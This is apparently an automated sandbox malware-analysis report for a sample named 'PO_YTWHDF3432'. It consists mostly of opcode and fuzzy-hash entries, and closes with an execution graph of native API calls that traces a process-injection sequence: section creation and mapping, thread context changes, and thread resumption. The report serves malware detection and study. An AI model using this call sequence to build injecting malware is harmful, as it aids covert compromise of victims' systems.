                                                                          • Opcode Fuzzy Hash: b844192177a5787065a29c9ee127857aa5baa53d155c904c0477799816a1f7ff
                                                                          • Instruction Fuzzy Hash: B711B674A21908DFCB40DF99F18D998BFB0FF48310F5240D9E884A7365DB31AAA4CB05
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1260568359.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_dbd000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cf9bf46c62a376fb861229b30d49e1f91ee4cd5cb1d683480d509f9e0585f44a
                                                                          • Instruction ID: c782db798d1a6f135a7516f3a388830d12d1168179345d06df0709741317dca3
                                                                          • Opcode Fuzzy Hash: cf9bf46c62a376fb861229b30d49e1f91ee4cd5cb1d683480d509f9e0585f44a
                                                                          • Instruction Fuzzy Hash: A101A771504340DBE7205E15CD84BE6BB99DF82324F28C52AED4B1B286EA79D840CA71
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 63ec475421803bb2511ea34a86d41ba7e2394c90345577c53c60a9149de13422
                                                                          • Instruction ID: 980417b1d653437d3f55fbae6d10812c2f86bf9144461fb8a5924f9991b87d25
                                                                          • Opcode Fuzzy Hash: 63ec475421803bb2511ea34a86d41ba7e2394c90345577c53c60a9149de13422
                                                                          • Instruction Fuzzy Hash: A1119274A21908EFCB40DF99F589998BFF0FF48310F5240D5E884A73A5DB31AAA4CB05
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 836816359e8d48fcb3bdf9894a5b798b4229054196864851e1fc98e2cad65b42
                                                                          • Instruction ID: 58d8c3528df277ea0e1dba7c6d9b57485cc77e11891d770325250eb5e566ae34
                                                                          • Opcode Fuzzy Hash: 836816359e8d48fcb3bdf9894a5b798b4229054196864851e1fc98e2cad65b42
                                                                          • Instruction Fuzzy Hash: CB018B34B10318ABEB44A675981D76E79A3AFC9750F248414F806F73C5DDB05D829B51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1260568359.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_dbd000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a14b2ca9068aa05d7e6d73ffee83c5d409043e802700a533844cdf3a88661235
                                                                          • Instruction ID: b67dfae90abb53d1cbf5f4b81958257cf38290f7f6577d7d5d3f8cb6fa2e7d90
                                                                          • Opcode Fuzzy Hash: a14b2ca9068aa05d7e6d73ffee83c5d409043e802700a533844cdf3a88661235
                                                                          • Instruction Fuzzy Hash: 3EF0C2714043409FE7208E15CD84BA2FF98EB81334F28C45AED091F286D6799C40CAB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: de5f202602972581b358e685e565dfcaeb5bb430416fd368f01b32c3a3c06ffe
                                                                          • Instruction ID: 2a6d09326021a12c4589403a8369d5b9df0c6dd02bf9386687113f9f3a105095
                                                                          • Opcode Fuzzy Hash: de5f202602972581b358e685e565dfcaeb5bb430416fd368f01b32c3a3c06ffe
                                                                          • Instruction Fuzzy Hash: 44F05536B046B04FD70852A59C023B23BAAFFC1B21716815BEA13ABB44CD305C428BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8d32866cce37f4ddc822eb3bfde1eda37b6322630306fc2a8fd25a74354fb2a0
                                                                          • Instruction ID: d5a0ad5ae4aa053c401511eacea5f80bd840c2180df6175b6b4386a26fd41d55
                                                                          • Opcode Fuzzy Hash: 8d32866cce37f4ddc822eb3bfde1eda37b6322630306fc2a8fd25a74354fb2a0
                                                                          • Instruction Fuzzy Hash: A9011A70900219DEDB14CFA9D4443EE7FB1BF48361F18826DE828AA5A0D7744A85CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f00b6292126ea236f1109e8df0c3a46d6f7fe9d2178788a6b7a96755cd0984b4
                                                                          • Instruction ID: 413e093d43b271464f529e7e58a9d8b31dea05bcc7a00633dc8598db05572cc6
                                                                          • Opcode Fuzzy Hash: f00b6292126ea236f1109e8df0c3a46d6f7fe9d2178788a6b7a96755cd0984b4
                                                                          • Instruction Fuzzy Hash: 5301E870800219DFDB14CF6AD4043AEBEF1BF48361F14862DE828AA2A0D7744A80CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8896f5011961dfcdb3a759628989eea5b2392a38fbb280bc368292ed390c442a
                                                                          • Instruction ID: 44e166a243af5e0302413d78e04a3a388ced864abb207f48f7ff7b988145739b
                                                                          • Opcode Fuzzy Hash: 8896f5011961dfcdb3a759628989eea5b2392a38fbb280bc368292ed390c442a
                                                                          • Instruction Fuzzy Hash: FFF02432518208CFDB04DBD8DC867D9B7B0EF44302F2044BEDC069BA45D63159C98B22
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d0c0a9558f335fc977b8c7abf0880527ec23469cba4e053a60aed92315e8515f
                                                                          • Instruction ID: 6cbc1692029c82e6ac221d3b95514d9d98bf6510573abffa1d9a46126f845a99
                                                                          • Opcode Fuzzy Hash: d0c0a9558f335fc977b8c7abf0880527ec23469cba4e053a60aed92315e8515f
                                                                          • Instruction Fuzzy Hash: 67F027B25083108ED3068A26D8007793BB57D80B52308C627DAA6C6995EF3085C286D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 91ac7460e164d064ba92980b68410b1cb17523bbc95f627556976cac681739dd
                                                                          • Instruction ID: 6970309cd3b1f2e1aba5bf981b85f1a0d97002dbdee214615d6a064ff4a1fb61
                                                                          • Opcode Fuzzy Hash: 91ac7460e164d064ba92980b68410b1cb17523bbc95f627556976cac681739dd
                                                                          • Instruction Fuzzy Hash: C1E03976B002286F93149A6AE884D6BBBEDEBCC660321807AF908C7311DA319C0186A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 790c4e31e3a143999ef39691f8b578cdd30a8551c4403f6ea5342ec7f976e701
                                                                          • Instruction ID: da970082b4aac8000372d2dd85e77c388687666e6d969abae7a41d59d92d1574
                                                                          • Opcode Fuzzy Hash: 790c4e31e3a143999ef39691f8b578cdd30a8551c4403f6ea5342ec7f976e701
                                                                          • Instruction Fuzzy Hash: AEF0E232A151098BEB089B99D8403EDB772FB84302F20853AED079AE48EA7049C54B60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 532617e57e5ad1e2e60e7d2517390b4208aba82696a142eef59898a7ca15371b
                                                                          • Instruction ID: 642627fa16d493c711ec7f7657b717e3221bcf2103143cbcf6b3c88484b4628b
                                                                          • Opcode Fuzzy Hash: 532617e57e5ad1e2e60e7d2517390b4208aba82696a142eef59898a7ca15371b
                                                                          • Instruction Fuzzy Hash: B6F0E271608108AFCB09DFA8D950E9E7FA9EF48260F05C0BEE408CB322E6709890C740
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 83fda329d23a04cc21afe79812c6f7d2c62fa0e1b80e71787ce1b0fc882316e7
                                                                          • Instruction ID: c7189214a11b72ff223a93f5182d5747f28ac71932534f2af7971f3a8a10372b
                                                                          • Opcode Fuzzy Hash: 83fda329d23a04cc21afe79812c6f7d2c62fa0e1b80e71787ce1b0fc882316e7
                                                                          • Instruction Fuzzy Hash: D7F0B7B0E0420A9FDB44DFA9C841BAEBBF4BB48211F1049A9E918E7701D77595418BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 89a14db9d90a528bb9a36234124f43ea4988fd186234be5e49d21ce029a657a1
                                                                          • Instruction ID: f226e42649c648a9bb13a2fb0391efc7157419736f9bcdfadc24f821f1ff0008
                                                                          • Opcode Fuzzy Hash: 89a14db9d90a528bb9a36234124f43ea4988fd186234be5e49d21ce029a657a1
                                                                          • Instruction Fuzzy Hash: 3EF06DB4D1428A9FDB15CFA9C441BAEBFF0AF09325F044999E860DB342DB759182CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 276a928f132e5da8678fa27671a68a6547adcc1e0402e803cc8ec84d43f3dafc
                                                                          • Instruction ID: b48ed6252561551ed1d02f0a7f6785ad5a62579035f3a8a94dd35aa484b1fea7
                                                                          • Opcode Fuzzy Hash: 276a928f132e5da8678fa27671a68a6547adcc1e0402e803cc8ec84d43f3dafc
                                                                          • Instruction Fuzzy Hash: 77E0D871208710CF93148E17D804A7A7BFA7DD0F92304C43BDE9B86904EF7095C186D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2db18c0fbda26dcce987c5a1dc8218364ec73bac70f814a30d3bf242ab1b4465
                                                                          • Instruction ID: 61f6f6feb78f843a947a0f921332ef3d246786e22a2150456034cd83878fb07b
                                                                          • Opcode Fuzzy Hash: 2db18c0fbda26dcce987c5a1dc8218364ec73bac70f814a30d3bf242ab1b4465
                                                                          • Instruction Fuzzy Hash: EEE0DF317006689B931856669C04B677AAEFBC0B21B208029EE069BB44DE70AC8187E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b267aa3baf7eb7a462f19077583555e9639a891f96aa74bbaf644057cae46368
                                                                          • Instruction ID: 09a46865c60488d6c61db4c85a1ec04c002caf5eb198eb5a5e22522bbcad9e6d
                                                                          • Opcode Fuzzy Hash: b267aa3baf7eb7a462f19077583555e9639a891f96aa74bbaf644057cae46368
                                                                          • Instruction Fuzzy Hash: 2EE0D871604008CFEB4455F0D0243AF2FA2F785726F155838EE076B780D8344DC25364
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4e4e4ab8bb9b7c953aaf3e07733f01e200bdbecad5a4888b835881a0ad41618b
                                                                          • Instruction ID: bbb12cf456cb46bf5df83b353d4084af3d211427aec91fa1519e1c86bccbe1fe
                                                                          • Opcode Fuzzy Hash: 4e4e4ab8bb9b7c953aaf3e07733f01e200bdbecad5a4888b835881a0ad41618b
                                                                          • Instruction Fuzzy Hash: 2BE0D1B1504B10C79334DF1A5500553B7FAB9C0B11314D57ED45B82E04FEB09755CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 87843caad7273e0b361c567feab95918467ce93316021c8c02ac52deaf802560
                                                                          • Instruction ID: 89bcce22c20508f7356f95138e28b9e0a2b48060395ed707bb6faa3601346f4d
                                                                          • Opcode Fuzzy Hash: 87843caad7273e0b361c567feab95918467ce93316021c8c02ac52deaf802560
                                                                          • Instruction Fuzzy Hash: 13E0263262A1088FDB08CF5CED89BACB370EF40113B0400BBDD06C7C60E671A9D84E11
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1b463e7b3ae7f342322df4eff67ade624697a978c254d0e7385d4cc59a174eee
                                                                          • Instruction ID: 39787470585088a3720f1dff6888f6808457d76e41d831c88cb2c5a17bdc6c7a
                                                                          • Opcode Fuzzy Hash: 1b463e7b3ae7f342322df4eff67ade624697a978c254d0e7385d4cc59a174eee
                                                                          • Instruction Fuzzy Hash: 34E0651648E7DC0EDB0357748D22794BF30AE23624B4E05CBE5C88F1A3C568089CE336
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:1.4%
                                                                          Dynamic/Decrypted Code Coverage:1.8%
                                                                          Signature Coverage:11.1%
                                                                          Total number of Nodes:397
                                                                          Total number of Limit Nodes:35
429463 LdrLoadDll 91356->91358 91360 427a2f 91357->91360 91359 427a01 91358->91359 91449 40a323 91359->91449 91360->91288 91362 427a12 91362->91288 91366 428593 91363->91366 91365 42a224 91365->91294 91367 4285f6 91366->91367 91368 4285b4 91366->91368 91369 429463 LdrLoadDll 91367->91369 91370 429463 LdrLoadDll 91368->91370 91374 42860c 91369->91374 91371 4285ce 91370->91371 91375 40b623 91371->91375 91373 4285ef 91373->91365 91374->91365 91376 40b645 91375->91376 91377 40b762 NtAllocateVirtualMemory 91376->91377 91378 40b78d 91377->91378 91378->91373 91380 4134d3 91379->91380 91381 4134ce 91379->91381 91382 42a1f3 2 API calls 91380->91382 91381->91306 91388 4134f8 91382->91388 91383 41355f 91383->91306 91385 413565 91387 41358f 91385->91387 91389 428683 2 API calls 91385->91389 91387->91306 91388->91383 91388->91385 91390 42a1f3 2 API calls 91388->91390 91397 427b63 91388->91397 91403 428683 91388->91403 91391 413580 91389->91391 91390->91388 91391->91306 91393 428683 2 API calls 91392->91393 91394 4137a5 91393->91394 91394->91297 91395->91301 91396->91305 91398 427b80 91397->91398 91399 429463 LdrLoadDll 91398->91399 91400 427b91 91399->91400 91409 1922df0 LdrInitializeThunk 91400->91409 91401 427ba8 91401->91388 91404 42869d 91403->91404 91405 429463 LdrLoadDll 91404->91405 91406 4286ae 91405->91406 91410 1922c70 LdrInitializeThunk 91406->91410 91407 4286c5 91407->91388 91409->91401 91410->91407 91412 427cc4 91411->91412 91413 427d0a 91411->91413 91414 429463 LdrLoadDll 91412->91414 91415 429463 LdrLoadDll 91413->91415 91416 427cde 91414->91416 91417 427d20 91415->91417 91420 40a733 91416->91420 91417->91315 91419 427d03 91419->91315 91423 40a755 91420->91423 91421 40a872 NtCreateSection 91422 40a8a1 91421->91422 91422->91419 91423->91421 91427 40a975 91424->91427 91425 40aa92 NtMapViewOfSection 91426 40aacd 91425->91426 91426->91327 91427->91425 91431 409f45 91428->91431 91429 40a062 NtGetContextThread 91430 40a07d 91429->91430 91430->91336 91431->91429 91435 
40a145 91432->91435 91433 40a262 NtSetContextThread 91434 40a27d 91433->91434 91434->91345 91435->91433 91437 427b07 91436->91437 91438 427b39 91436->91438 91439 429463 LdrLoadDll 91437->91439 91440 429463 LdrLoadDll 91438->91440 91441 427b21 91439->91441 91442 427b4f 91440->91442 91445 40b213 91441->91445 91442->91353 91444 427b32 91444->91353 91448 40b235 91445->91448 91446 40b352 NtDelayExecution 91447 40b36e 91446->91447 91447->91444 91448->91446 91451 40a345 91449->91451 91450 40a462 NtResumeThread 91452 40a47d 91450->91452 91451->91450 91452->91362

                                                                          APIs
                                                                          • NtResumeThread.NTDLL(%o@,?,?,?,?), ref: 0040A46A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID: %o@$%o@
                                                                          • API String ID: 947044025-618112537
                                                                          • Opcode ID: 9a8e4d286178fea2a4a6c4b3173bc6d9a17118359cd30a0f8428712cc09e4e8b
                                                                          • Instruction ID: a180d3cde8570c79af263549b5a123663d1f596594efc184d6facc428f3df757
                                                                          • Opcode Fuzzy Hash: 9a8e4d286178fea2a4a6c4b3173bc6d9a17118359cd30a0f8428712cc09e4e8b
                                                                          • Instruction Fuzzy Hash: EA715D75E04258DFCB04CFA9D484AEDBBF1BF49304F1880AAE459B7341D238A952DF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,An@,00000000,?,?,08000000), ref: 0040A88E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateSection
                                                                          • String ID: An@
                                                                          • API String ID: 2449625523-62601564
